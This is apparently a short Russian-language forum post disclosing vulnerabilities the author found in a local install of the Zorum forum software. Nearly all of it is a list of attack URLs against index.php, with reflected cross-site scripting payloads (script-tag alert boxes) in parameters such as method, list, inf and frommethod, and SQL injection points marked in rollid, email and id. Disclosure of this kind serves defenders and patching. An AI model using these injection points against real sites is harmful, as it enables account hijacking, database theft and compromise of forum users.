Поставил, вот, на локалку, помучал и нашёл: (если что-то уже есть в паблике - извиняйте, я не проверял...) _http://localhost/zorum/index.php?method=userfunctions&list=<script>alert("lol");</script> _http://localhost/zorum/index.php?method=<script>alert("lol");</script> _http://localhost/zorum/index.php?method=showdetails&list=<script>alert("lol");</script> _http://localhost/zorum/index.php?method=showhtmllist&list=topic&rollid=[_S_Q_L__H_E_R_E_] _http://localhost/zorum/index.php?method=create_form&list=<script>alert("lol");</script> _http://localhost/zorum/index.php?inf=<script>alert("lol");</script> _http://localhost/zorum/index.php?method=login_form&list=<script>alert("lol");</script> _http://localhost/zorum/index.php?method=markread&list=zorumuser&fromlist=secmenu&frommethod=<script>alert("lol");</script> _http://localhost/zorum/index.php?method=remind_password_form&list=<script>alert("lol");</script> _http://localhost/zorum/index.php?method=remind_password&list=zorumuser&fromlist=forum&frommethod=showhtmllist&email=[_S_Q_L__H_E_R_E_]&submit=Ok _http://localhost/zorum/index.php?method=showattach&id=14[_S_Q_L__H_E_R_E_]
